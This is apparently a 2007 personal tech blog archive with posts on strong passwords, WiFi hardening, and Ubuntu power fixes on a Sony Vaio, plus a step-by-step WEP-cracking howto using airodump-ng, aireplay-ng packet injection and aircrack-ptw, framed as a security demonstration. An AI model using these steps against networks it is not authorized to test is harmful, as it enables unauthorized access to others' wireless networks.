Thursday, August 30, 2007

How to make strong passwords

Our passwords can be guessed or obtained by dictionary attacks. To protect our private data and resources, we must have passwords that cannot be guessed and that don't appear in dictionaries.

Next, a few recommendations to make our passwords more secure:
You must avoid using dates, names and dictionary words.
You should use letters (lower case and upper case), mixed with numbers and symbols.
You should change your passwords periodically.

Given the difficulty that may involve remembering a password like 'ñF(fh3#"$j9', you can use the following technique to make the labor less hard:
Think a phrase (five or more words) that means something to you. In this example I'll use 'To be or not to be'. Then take a number (three or four digits) that you can remember (I'll use 1234). No with all this, you take the first letter of each word (one upper case, one lower case) and you mix it with the digits of the number you chose. If you always use the same keyboard layout (or if you can remember it by heart), you may convert numbers into symbols by pressing the 'shift' key.
Following this example , my keyword would be:

This is just a base, you may alter this idea, for instance you may begin with numbers, or two letters for each number, or use the second letter of each word, etc. Use your imagination!

You now have the basis for having strong passwords easy to remember.

Technorati tags: ,
Versión en español

Technorati tags:

Tuesday, August 28, 2007

How to make a Wireless network more secure

I decided to gather a series of recommendations to make WiFi networks more secure.

Please have in mind that every system is vulnerable, it is only about reducing the risk of being vulnerated.

I divide recommendations in two parts: AP (Access Point) and the workstation.

At the AP

  • Change the SSID by default. It's not good to have those from factory (ej: Linksys, 3COM, etc.)
  • Change AP's default password. It is relatively easy to find out the AP's model, and from there to know the default admin password.
  • Deactivate SSID broadcasting. This doesn't add much security, but discourages 'casual hacker'.
  • Use WPA or WPA2. Don't let the network without security. WEP is vulnerable (see my other post, however if WPA or WPA2 are not available, WEP is better than nothing.
  • Filter by MAC Address. Even if a MAC address can be changed, this is more complicated for common people.
  • Deactivate DHCP. Unless it is not possible, use static IP addresses.
  • Limit the maximum number of IPs in the DHCP. This would limit the quantity of devices connected (however more devices can be added with static IPs).
  • Turn the AP off when not in use. This is not always possible. For home networks, this option is good, as long as you don't let your PC turned on for accessing it from the internet.
  • Change the passwords often. With time, passwords can be obtained. To change them regularly it is a good practice.
  • Limit the AP power. This is quite effective. It is always good to lower the power at the minimum (verifying that the farthest device can connect correctly). This lowers the chances of connection from distant devices (eg: someone in the street).
  • Choose AP's location wisely. It is good to put the AP in the center of the house, away from windows and exterior walls (see preceding point).
  • Use secure passwords. It is good to use passwords that mix letters, numbers and signs. If possible, use entirely random hexadecimal passwords.
  • Disable AP's remote administration. This impedes someone from outside the network from accessing the AP.
  • Activate Firewall at the AP.

At the workstation

  • Verify who installed the AP. There are APs planted to capture network traffic. You should check it is a legitimate AP.
  • While surfing the net, do not enter passwords, or sensitive information in pages not marked as secure. Before entering credit card numbers, bank or email passwords, check that the site address begins with 'https://'.
  • Do not share public folders. This is a very common mistake: to have shared folders while connecting to a (public) wireless network.
  • Verify you have an active firewall. When connecting to public wifi networks, you are exposed to attack from other devices inside the network.
  • Shutdown the wireless card when not in use. Besides the obvious energy savings, an attacker could create an 'ad-hoc' network with the active NIC.
  • Use a VPN. If you have a VPN (generally available in corporate environments), this makes the connection more secure.

Always remember that we are 'just making it more difficult' to hackers. We should avoid making it easy ;-)

You can check these links too:


Versión en español

Technorati tags:

HOWTO Crack WEP - Sony Vaio

Based on a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I never actually did it myself.

Note: This is only for researching, learning, and security checking purposes. This shouldn't be used to crack networks owned by other people. To attack and to vulnerate networks (or other resources) is bad, and illegal.

Doing some research, I found that my Sony Vaio VGN N350FE wireless card (an Intel 3945ABG), didn't allow certain things from linux, among them one necessary to demonstrate this vulnerability.

If you read my previous posts, you'll see that this is not the first problem I find with hardware.

Also it isn't the first I find a solution for :-)

I found a howto at that I used as a base.

Next, the steps I followed to crack WEP.

We need a linux distribution availabe at We download the CD image and we burn it.

We boot the notebook with WifiWay (it must be able to boot from optical drives).

Once started, we open the X:


We set the channel of the AP (Access Point) in the NIC.

echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel

We get the BSSID, the channel and the ESSID.

airodump-ng rtap0

We finish the execution with CONTROL-C, and we set the BSSID (an HEX number with 6 positions) in the NIC.

echo 'AP_BSSID' > /sys/class/net/wifi0/device/bssid

Once we do this, we start capturing.

airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0

We open a new window and we set speed at 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

We activate the nic.

ifconfig wifi0 up

We look for our MAC address, it's the first 12 numbers stated in HWaddr


We initiate an association with the AP.

aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0

We open another terminal and we start injecting traffic:.

aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0

This should incremente the number of data in the capture window (it takes a while before it starts incrementing).

When we have over 100.000, we may extract the key by executing:

aircrack-ptw CAPTURE_FILE.cap

This should give us the key in hex format.

I hope this is useful to you.

Technorati tags: , , , , , ,


Versión en español

HOWTO Ubuntu Feisty + Sony Vaio VGN N350FE

With some patience, searching in forums, researching, and some luck, I managed to solve the energy problem of my laptop: a Sony Vaio VGN-N350FE using Ubuntu Feisty.

Warning: if you dare to follow this howto, be aware that the system may become unstable, unusable, or worse, like damaging the hardware. Only follow these steps at your own risk.

On a clean installation of Ubuntu Feisty, I update every package proposed by the update manager.

I install the kernel (available in Gutsy), for which we need to include the corresponding repositories.

On the command line we execute:

sudo gedit /etc/apt/sources.list

In the editor, we add the following lines at the end of the file.

deb gutsy main restricted
deb gutsy universe

Save and close. Then execute this:

sudo apt-get update

After this, it's possible that the update manager offers us to update a bunch of packages (actually from Gutsy). We shouldn't do it. Only do what's stated here.

We execute:

sudo apt-get install linux-backports-modules-2.6.22-9-generic linux-headers-2.6.22-9 linux-headers-2.6.22-9-generic linux-image-2.6.22-9-generic linux-restricted-modules-2.6.22-9-generic linux-ubuntu-modules-2.6.22-9-generic

Since we just installed a new kernel, I believe it's a good idea to restart the notebook. After restarting, we open a new terminal window and we execute:

sudo apt-get install powertop cpufrequtils libncursesw5

Now we must remove Gutsy's repositories. We execute:

sudo gedit /etc/apt/sources.list

We comment the lines we inserted before, by inserting # at the beginning of the lines.

We update the package manager:

sudo apt-get update

Now we make sure that sony's energy management modules are installed. We execute:

sudo modprobe sony_acpi
sudo modprobe sonypi

We make these modules to load automatically on boot:

sudo gedit /etc/modules

We add the two following lines to the end of the file:


We execute this to be able to use brightness controls:

sudo locate -u && for i in $(locate lcd-???-brightness); do sudo cp $i $i.bak; sudo sed -i '1 s|#!/bin/sh|#!/bin/bash|g' $i; done

Now we can add the brightness control to Gnome's Panel. After this, reset the notebook, so the brightness control is active.

When we use our laptop on battery, we need to execute on a terminal:

sudo powertop

This opens a text application that tells us which elements are consuming power, and recommends us to carry on certain actions to improve battery's use.

Before this, the battery lasted less than half hour, after this, more than four hours.

For references, I used these posts:

Technorati tags: , ,


Versión en español

Tuning my notebook

I recently bought a Sony Vaio VGN-N350FE
At my home-office I have a color laser printer HP 2600n, and with my brand new notebook, I cannot print. Windows Vista throws a "Data Execution Prevention" error, and the spool service dies (before this, I never had any troubles - not with Windows XP, not with Ubuntu).
I googled a lot, and I found no solution. It seems to be a compatibility problem between HP drivers and Windows' new version.
This (and other motives) make me decide to install ubuntu feisty in this machine. Everything is fantastic, except the energy management issue. Keyboard function keys do not work, and following some tutorials led to no solution (apparently, I have a 'too' new model).
So in the mean time, if I use Windows, I cannot print, and if I use Linux, battery duration is less than acceptable.
I can assure you, my estimated reader, that this will continue.

Versión en español

First step

This is the first tuxero post, with much expectation and desires.
This is a short salutation, since the main thing of this blog is its contents, not the introduction.
Soon, soon, I'll be adding new contents.


Versión en español